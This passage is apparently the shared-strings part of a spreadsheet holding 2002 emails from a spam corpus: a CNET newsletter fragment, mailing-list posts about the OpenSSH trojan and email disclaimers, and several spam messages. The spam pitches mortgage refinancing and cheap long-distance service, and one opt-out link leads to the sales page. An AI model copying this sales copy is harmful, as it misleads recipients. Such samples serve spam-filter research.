 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h6"&gt;&lt;b&gt;Earnings alert: Handspring trims loss&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Read the latest in earnings reports and financial news from some of technology's leading players. This page is updated as new reports are filed. Keep checking back for the latest.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 18, 2002, 11:00 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=5e-ssGdIn0i96ZzzeyhsnStcVTQzc9R"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&lt;b&gt;The view from Expedia's pilot&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 CEO Richard Barton on the online travel company's big plans for corporate-travel services--and on Barry Diller's takeover bid.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 18, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=73-__ZeIBB9P59tvijT8UEE0WNrUZcR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;b&gt;WorldCom feels the freeze&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 A quick reorganization and turnaround are looking ever less likely now that a New York judge has put $2.5 billion of its assets on ice.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 18, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=88-ec5PQQKHi5Kf4Ux-rU358atSBbiR"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href="http://clickthru.online.com/Click?q=9d-kkCWQv0hotlIednuKLvd75wKZzPR"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href="http://clickthru.online.com/Click?q=b2-M4pwQX04AFwfM5YjM2cmpxUCPunR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/pg/021502_pointcamera.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c7-KG43QLPPHrusZi8NWtUoF24wxeeR"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href="http://clickthru.online.com/Click?q=dc-40zzQ0LQvqwl8TvBz6gEwTinhlyR" &gt;5-megapixel shoot-out&lt;/a&gt;&lt;br /&gt;
 &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=f1-MtTuQpsTLuBpoIQH3XX8owMnerlR"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href="http://clickthru.online.com/Click?q=06-fP6uI481hKWl36omap_vCgSyiL4R" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 2. &lt;a href="http://clickthru.online.com/Click?q=1c-cs_iIFraA8jagP3n9kgGa2oXqGyR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 3. &lt;a href="http://clickthru.online.com/Click?q=31-V_YRIjMwkaSz7aZyLxjkqVAXXblR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 4. &lt;a href="http://clickthru.online.com/Click?q=46-19zwInpkGH5i8s6a1cN0535V0Y9R" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 5. &lt;a href="http://clickthru.online.com/Click?q=5b-5LOwIBKkZhc3YmqxCjjvDSwizzcR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=70-3vnJIdpiybsfOjzKns2asfI8UkRR"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src="http://news.cnet.com/i/ne/bb/2002/07/0717_jobs3a.jpg" alt="" width="96" height="72" border="0"&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;
                         &lt;b&gt;&lt;font size="+0"&gt;&lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJm04zVBRgSjaeTldfVpf4R" &gt;New iPod does Windows&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 At Macworld in New York, Apple Computer CEO Steve Jobs shows off a new iPod that's thinner, cheaper -- and compatible with Microsoft Windows. &lt;br&gt;
                         &lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIm1AfPI8e0dAVJ9PZAKTrR" &gt;&lt;img src="http://news.cnet.com/i/gl/vid-w.gif" width=24 height=18 border=0 hspace=3 align=top&gt;&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=b0-NZmfQQJQNJijeftdxQMKtNX8PQiR"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href="http://clickthru.online.com/Click?q=c5-8BcDQzO4TxlnAJMzSROUJEymxqPR" &gt;
 SAP's sales sagging&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=da-dT8jQUP7l4Ba9sBbjsMVKpv3DxnR" &gt;
 EMC breaks even&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ef-04uYQmkx5ZM31HOqBxDVAmoBameR" &gt;
 TI boosts Sun's UltraSparc chip&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;E-Business&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQcTfhLUsY98BbBL7kOi_yR" &gt;
 Tech stocks wallow in earnings funk&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=19-BLe0I2rcge7KMLcKMZ2Fz8IR7XlR" &gt;
 Corporations favor age, experience&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=2e-eMTGIiKj5MjbWx_ktQ3DlPfP8N4R" &gt;
 E*Trade profit up on cost cuts&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Communications&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJ3L8Sy_rk9Z5VKc-3P0BcR" &gt;
 KPNQwest network's shutdown imminent&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=59-y53oIEn9utsyw3vlpW-B_KMqztFR" &gt;
 WorldCom may file bankruptcy next week&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyEG1De0fbrQA5K-fxuEL59R" &gt;
 Level 3 gives mixed signals on recovery&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Media&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=83-U-BXQYJq_Z-68gWtuoAABMMPZ9rR" &gt;
 Record labels target Chinese portals&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_z4Y8MMqsnCW5CH7esbKRiR" &gt;
 AOL's accounting scrutinized&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEpaIcKN3PQhaIHsSzky0PR" &gt;
 Some Beijing Net cafes reopen&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
        &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                        &lt;b&gt;Personal Technology&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEDqU6LoiigVnxXFZcIuInR" &gt;
 Trying to connect at Macworld&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=d7-wk3ZQLWDyUL0DzRRmBekeVktk2eR" &gt;
 ATI uncovers comeback chips&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy13z69urJ1kOqFb2GVaGyR" &gt;
 Apple's .Mac faces a hard sell&lt;/a&gt;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href="http://clickthru.online.com/Click?q=01-9oXDI2jxOqf18rwvurMPGPxZ6RlR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;p&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@spamassassin.taint.org&lt;br&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=17-agPtzOXSeKZnaGiMzyFlCX5t7RJ8gRRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=2c-DatOIc0kqhD91K2c-r7MBvWpjuyR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKzoKjjE1UU5CfCkxHB0FFR"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href="http://clickthru.online.com/Click?q=56-NwKYInnwtkh9pFOrctPQDwwaMC9R" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6b-8g5ZIHEXs-sagOO80ywQ-4d0P6cR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0J6P1AF62oaDkjVsTLZ8iR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdKmP0t9r3r1yZeU_u_KnPR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUQ1CMwl8rWLXZBXqONOVnR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8ZQwRxZ4Gc5w8PF_jEuwteR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e433&amp;ISSUE=2002-07-18" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=d5-p-Si-vLA49jcYoogRFir-4gvy9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Cash in on your home equity
</t>
  </si>
  <si>
    <t xml:space="preserve">Mortgage Lenders &amp; Brokers Are Ready to
         compete for your business.
 Whether a new home loan is what you seek or to refinance
 your current home loan at a lower interest rate, we can help!
 Mortgage rates haven't been this low in years take action now!
 Refinance your home with us and include all of those pesky
 credit card bills or use the extra cash for that pool you've 
 always wanted...
 Where others say NO, we say YES!!!
 Even if you have been turned down elsewhere, we can help!
 Easy terms!  Our mortgage referral service combines the
 highest quality loans with the most economical rates and
 the easiest qualifications!
 Take just 2 minutes to complete the following form.
 There is no obligation, all information is kept strictly
 confidential, and you must be at least 18 years of age.  
 Service is available within the United States only.
 This service is fast and free.  
 Free information request form:
 PLEASE VISIT
 http://builtit4unow.com/pos
 ****************************************************************
 Since you have received this message you have either responded
 to one of our offers in the past or your address has been
 registered with us.  If you wish to "OPT_OUT" please visit:
 http://builtit4unow.com/pos
 ****************************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Malicious code hidden in email software
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8710804,1440/
 Date: Not supplied
 The new software was switched for dummy code containing a "Trojan horse" on its 
 download servers
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 2 Aug 2002, kevin lyda wrote:
 &gt; On Fri, Aug 02, 2002 at 12:23:04PM +0100, Dermot Beirne wrote:
 &gt; &gt; I will be out of the office starting  02/08/2002 and will not return until
 &gt; &gt; 06/08/2002.
 &gt; ...
 &gt; &gt; The information in this email is confidential and may be legally
 &gt; [7+ line sig deleted]
 &gt; 
 &gt; an automated message to ilug.  one of those goofy confidentiality
 &gt; signatures.  more then four lines in a sig.
 this is serious. the highly confidential information that dermot is
 out of the office has leaked! i think it would be best if we all
 email the "Systems Manager" as a matter of urgency. in lieu of an
 email address i suggest emailling all of postmaster, info, sales,
 hostmaster, webmaster, support and accounts (and any other address
 one can think of).
 now, considering the critical nature of this leak, if you do not 
 receive an adequate reply i think one would be duty bound to raise 
 the matter again, and again if needs be, until one gets a 
 satisfactory reply.
 also, i notice a lot of people on this lot who post from company 
 addresses do not have disclaimers on their emails. i would encourage 
 everyone in a professional position to raise the matter of 
 disclaimers internally and ensure that disclaimers are implemented 
 for company emails, stationary and phone systems.
 finally, the email-disclaimers advocacy site 
 	http://www.emaildisclaimers.com/
 may prove to be a useful resource. rather strangely one of the quotes 
 on the front-page of their site is:
 	'The disclaimers added to the end of emails are not legally 
 	binding, but it's always good practice to try and disclaim liability'
 	-- Michael Chissick, Head of Internet law at Field Fisher 
 	Waterhouse
 However, i suggest this quote, partly the initial part, be ignored
 and that other more favourable quotes (by self-aggrandising
 pundits^W^Wleading experts)  be heeded instead.  Also, there is a
 vicious rumour going round that a year or so ago a rather large
 company in the UK lost a court case where an employee sent out some
 kind of libellous email or somesuch despite the company having
 implemented email disclaimers. pay no heed to this - its just a
 rumour (http://www.weblaw.co.uk/artemail.htm).
 Anyway, please: Email exel.com!!!
 &gt; kevin
 NB: This email is copyright 2002 Paul Jakma. By reading this email
 you agree to compensate me by paying me the sum of EUR200 - please
 contact the copyright author for further details on settling your
 fee. If you do not agree, please unread this email and delete this
 email immediately. Further, this email is copyright protected through
 the use of ASCII ROT-8 encryption. Circumvention of this digital
 copyright protection may be a criminal offense in certain
 jurisdictions.
 (and if it isnt in your jurisdiction, dont worry, the WIPO is working
 tirelessly to make sure it will be).
 regards,
 -- 
 Paul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A
 	warning: do not ever send email to spam@dishone.st
 Fortune:
 "At least they're ____________x0008__x0008__x0008__x0008__x0008__x0008__x0008__x0008__x0008__x0008__x0008_EXPERIENCED incompetents"
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Long distance                                   1335Pv-6
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;body bgcolor="#FFFFFF" text="#CC3333"&gt;
 &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font size="3"&gt;Hi: &lt;br&gt;
   &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3" color="#000000"&gt;Have 
   you been paying too much for your home or&lt;br&gt;
   business long distance?&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" color="#000000"&gt;&lt;b&gt;&lt;font size="3"&gt;Have 
   you been looking for an affordable but honest&lt;br&gt;
   long distance alternative?&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font size="3"&gt;We are offering 
   Fiber optic Long distance for&lt;br&gt;
   as low as $9.95 per month!&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font size="3"&gt;&lt;a href="mailto:phoneoffer001@netscape.com?subject=Phoneoffer"&gt;Email&lt;/a&gt; 
   us with your phone number and we'll call you&lt;br&gt;
   back so you can hear how great the connection is.&lt;br&gt;
   &lt;br&gt;
   Six plans to choose from including a travel plan. &lt;br&gt;
   &lt;br&gt;
   &lt;font color="#000000"&gt;There are no credit checks and because you don't &lt;br&gt;
   need to change your long distance carrier, your &lt;br&gt;
   service can be turned on in just a few hours. &lt;br&gt;
   &lt;/font&gt;&lt;br&gt;
   Distributors needed! &lt;br&gt;
   &lt;br&gt;
   &lt;font color="#000000"&gt;We have distributors now making a few hundred to &lt;br&gt;
   many thousands of dollars per month from the comfort &lt;br&gt;
   of their homes. &lt;/font&gt;&lt;br&gt;
   &lt;br&gt;
   Obtain &lt;a href="mailto:phoneoffer001@netscape.net?subject=Phoneoffer"&gt;complete 
   details&lt;/a&gt; Include your phone number- we'll&lt;br&gt;
   call you back to confirm our crisp clear connection.&lt;br&gt;
   &lt;br&gt;
   To be removed: &lt;a href="mailto:nottoday@netscape.net"&gt;click here&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 9954ceKz6-102mjlg8918qBcR4-723lUuX3399cRNs0-338xWys4979yobM4-873gAkQ5719cl69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</si>
  <si>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[ILUG] Fwd: OpenSSH trojan?
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Aug 02, 2002 at 09:55:02AM +0000, Conor Daly wrote:
 &gt; looks like there is a trojan in the latest OpenSSH
 and the amazing bit is that it was caught in 6 hours thanks to the
 freebsd ports system (it automatically checks md5sums).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</si>
  <si>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Good Earnings Report
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000229.html
 Date: 2002-10-09T20:59:51-08:00
 Yeay! We had a good earnings report at work today. There was much happiness and 
 a good party after the news. I'm not quite sure how we managed that, but we're 
 still making money. I had the distinction of being...
</t>
  </si>
  <si>
    <t xml:space="preserve">--]
 --] Anyone heard of this law before?
 Back when I was running the WSMF shoutcast server these restrictions were
 just being placed on netcasters. Most folks laughed it off. Now with the
 license fees its not laughable anymore. If you pay the fee you are bound
 to the restrictions, if you dont your running the criminal line.
 I still run a stream up on live365. Its been playing the same 10 hour
 block of Jean Shepard shows for the last year. I really should change them
 up.
 If I were going to do the old WSMF shoutcast now adays I would either
 spend lots of time going over regulations to see what I can or cannot do
 or I would just chuck the regs out and do what I want. Or I might write
 some apps to stay in regs ..I dont know..one thing is for sure it
 defiently takes the spontaneous edge off things:)-
 F Murray Abraham
 F Scott Fitzgerald
 F Hillary Rossen
 -tom
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: =?big5?Q?=A7A=A6b=B4M=A7=E4=BE=F7=B7|=B6=DC=3F=3F=A5=B4=B6}=A8=D3=AC=DD=AC=DD?=
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_9f5cBwKPXMZ2oYIR
 Content-Type: multipart/alternative;
 	boundary="----=_NextPart_9f5cBwKPXMZ2oYIRAA"
 ------=_NextPart_9f5cBwKPXMZ2oYIRAA
 Content-Type: text/html;
 	charset="big5"
 Content-Transfer-Encoding: base64
 PCEtLSBzYXZlZCBmcm9tIHVybD0oMDAyMilodHRwOi8vaW50ZXJuZXQuZS1tYWlsIC0tPg0KPGh0
 bWw+DQoNCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0
 ZXh0L2h0bWw7IGNoYXJzZXQ9YmlnNSI+DQo8bWV0YSBuYW1lPSJHRU5FUkFUT1IiIGNvbnRlbnQ9
 Ik1pY3Jvc29mdCBGcm9udFBhZ2UgNS4wIj4NCjxtZXRhIG5hbWU9IlByb2dJZCIgY29udGVudD0i
 RnJvbnRQYWdlLkVkaXRvci5Eb2N1bWVudCI+DQo8dGl0bGU+t3O69K22MTwvdGl0bGU+DQo8L2hl
 YWQ+DQoNCjxib2R5Pg0KDQo8IS0tIHNhdmVkIGZyb20gdXJsPSgwMDIyKWh0dHA6Ly9pbnRlcm5l
 dC5lLW1haWwgLS0+DQo8cD48c3BhbiBzdHlsZT0iQkFDS0dST1VORC1DT0xPUjogI2ZmZmYwMCI+
 PGZvbnQgc2l6ZT0iNyI+wr4gs/Ugp9Ygs/g8L2ZvbnQ+PC9zcGFuPjwvcD4NCjxwPjxmb250IHNp
 emU9IjMiPqRHpFGkQKVArPaquqn6pOmkp6xQPC9mb250PjwvcD4NCjxwPjxmb250IGNvbG9yPSIj
 RkYwMDAwIiBzaXplPSI3Ij48bWFycXVlZSBiZ2NvbG9yPSIjRkZGRkZGIiB3aWR0aD0iNTczIj6h
 ub/LIKn0ILNzIMLqILZXILDTobk8L21hcnF1ZWU+PC9mb250PjwvcD4NCjxmb250IHNpemU9IjIi
 Pg0KPHA+pmKkQKT5pKO0uq7wpKShQaTppc6rfqWrs/WktKRAqku/V6hxoUO1TL3XrE+mYq78pLql
 fqFBPC9wPg0KPHA+rNKsT6RAvMuhQ7hnwNm+x6rMuXem9KFBpOmlzqt+pauz9aS0rE+lRK5fuGfA
 2aRqtmKhQzwvcD4NCjwvZm9udD4NCjxwPjxiPqRApfelSaVYoUGkQKXNw/bDaDwvYj48L3A+DQo8
 cD48Zm9udCBmYWNlPSJBcmlhbCBVbmljb2RlIE1TIiBzaXplPSI0IiBjb2xvcj0iIzAwMzNDQyI+
 PGI+PHNwYW4gc3R5bGU9ImJhY2tncm91bmQtY29sb3I6ICNGRkZGNjYiPsFwpliu+LZPLKZAqMmm
 XvVYLLu0w1ClW7f5LLPGqPy0TLphPC9zcGFuPjwvYj48L2ZvbnQ+PC9wPg0KPGZvbnQgc2l6ZT0i
 MiI+DQo8cD6qurhnwOeyeqnAoUOlabuhrE+l2Ktls3PC6rZXsNOkpKq6pEDB+6n6q0ekp6xQoUM8
 L3A+DQo8cD6ssKRGqd2uabd+sMihQafarcymqKXfuvS49KbmvlCvU7BWsU23fr3StXs8L2ZvbnQ+
 PGZvbnQgc2l6ZT0iMyI+PGI+LDxhIGhyZWY9Imh0dHA6Ly9ndG8uaDhoLmNvbS50dy+69Lj0r1Ow
 Vi+vU7BWrbqtti5odG0iPsV3qu+xeqjTp+ukSjwvYT48L2I+PC9mb250PjwvcD4NCjxmb250IHNp
 emU9IjIiPg0KPHA+sdCofLC1qOy80LfHpMahQqjuq9ewtajspliyeqTGoUGow6VItse+UKTOtsey
 zrNzwuq2V7DTwvmk6K2xpua+UDwvcD4NCjxwPqFps2+sT6RArdOlUrqht1K7UKfGseaquqjGt36h
 QcV3qu+xeqq6pVukSqFDoWo8L3A+DQo8L2ZvbnQ+DQo8cD48c3BhbiBzdHlsZT0iQkFDS0dST1VO
 RC1DT0xPUjogI2ZmOTlmZiI+PGZvbnQgc2l6ZT0iNCI+uGfA2ad4w/iqzKFBpv2v4KRPsWqhQqaz
 vcSrbKFDpECwX6ZYp0CmQKZQpqiq+KFDPC9mb250Pjwvc3Bhbj48L3A+DQo8cD48Zm9udCBzaXpl
 PSI0Ij48c3BhbiBzdHlsZT0iQkFDS0dST1VORC1DT0xPUjogIzAwZmZmZiI+Jm5ic3A7Jm5ic3A7
 Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i
 c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7
 Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i
 c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7
 Jm5ic3A7Jm5ic3A7IA0KuNSxob3QrKI6Jm5ic3A7PGEgaHJlZj0iaHR0cDovL2d0by5oOGguY29t
 LnR3LyI+ILOvqbGq+DwvYT48L3NwYW4+PC9mb250PjwvcD4gICANCjxwPqFAPGZvcm0gYWN0aW9u
 PSJtYWlsdG86Z3RvODJndG84MkBzZWVkLm5ldC50dz9zdWJqZWN0PbdRwUG40aVbt/mzcbj0qMa3
 fiIgZW5jVHlwZT0idGV4dC9wbGFpbiIgbWV0aG9kPSJwb3N0IiA8cD48L3A+ICAgDQogIDxwIGFs
 aWduPSJsZWZ0IiBzdHlsZT0iTUFSR0lOLUJPVFRPTTogLTJweDsgTUFSR0lOLVRPUDogLTJweCI+
 PGI+PGZvbnQgY29sb3I9IiNjYzY2ZmYiIGZhY2U9IrdzstOp+sXpIiBzaXplPSI0Ij690KTEv++x
 eqxPp1+73a1up9qtzDxzcGFuPqdLtk+qurPQt36l+rrQPC9zcGFuPjwvZm9udD48L2I+PC9wPiAN
 CiAgPHAgYWxpZ249ImxlZnQiIHN0eWxlPSJMSU5FLUhFSUdIVDogMjAwJTsgTUFSR0lOLUJPVFRP
 TTogNnB4OyBNQVJHSU4tVE9QOiA2cHgiPjxiPjxmb250IGNvbG9yPSIjMDAwMGZmIiBmYWNlPSK1
 2LFkstO26sXpKFApIiBzaXplPSI0Ij48aW5wdXQgbmFtZT0ip9qtbq/BqPqnS7ZPqrqz0Ld+pfq6
 0CIgdHlwZT0iY2hlY2tib3giIHZhbHVlPSJPTiI+ICANCiAgPC9mb250PjxzcGFuPjxmb250IGNv
 bG9yPSIjZmYwMDAwIiBmYWNlPSK3c7LTqfrF6SIgc2l6ZT0iNCI+p9qtbq/BqPqnS7ZPqrqz0Ld+
 pfq60CZuYnNwOzwvZm9udD48L3NwYW4+PC9iPjwvcD4gDQogIDx0YWJsZSBib3JkZXI9IjEiIGNl
 bGxTcGFjaW5nPSIxIiBoZWlnaHQ9IjEiIHdpZHRoPSI2ODciPiANCiAgICA8dGJvZHk+IA0KICAg
 ICAgPHRyPiANCiAgICAgICAgPHRkIGFsaWduPSJyaWdodCIgYm9yZGVyQ29sb3JMaWdodD0iIzgw
 ODA4MCIgaGVpZ2h0PSIyMCIgd2lkdGg9IjQ4NCI+IA0KICAgICAgICAgIDxwIGFsaWduPSJyaWdo
 dCI+PGI+PGZvbnQgY29sb3I9IiNjYzY2ZmYiPqSkpOWpbaZXPC9mb250PjwvYj48L3A+IA0KICAg
 ICAgICA8L3RkPiANCiAgICAgICAgPHRkIGFsaWduPSJyaWdodCIgYm9yZGVyQ29sb3JMaWdodD0i
 IzgwODA4MCIgaGVpZ2h0PSIyMCIgd2lkdGg9IjczMyI+IA0KICAgICAgICAgIDxwIGFsaWduPSJs
 ZWZ0Ij48Zm9udCBjb2xvcj0iI2ZmZmYwMCI+PGlucHV0IG5hbWU9IqSkpOWpbaZXIiBzaXplPSIx
 NCI+PC9mb250Pjxmb250IGNvbG9yPSIjZmYwMDAwIj4ovdC28aSkpOWl/qZXKTwvZm9udD48L3A+
 IA0KICAgICAgICA8L3RkPiANCiAgICAgIDwvdHI+IA0KICAgICAgPHRyPiANCiAgICAgICAgPHRk
 IGFsaWduPSJyaWdodCIgYm9yZGVyQ29sb3JMaWdodD0iIzgwODA4MCIgaGVpZ2h0PSIxIiB3aWR0
 aD0iNDg0Ij4gDQogICAgICAgICAgPHAgYWxpZ249InJpZ2h0Ij48Yj48Zm9udCBjb2xvcj0iI2Nj
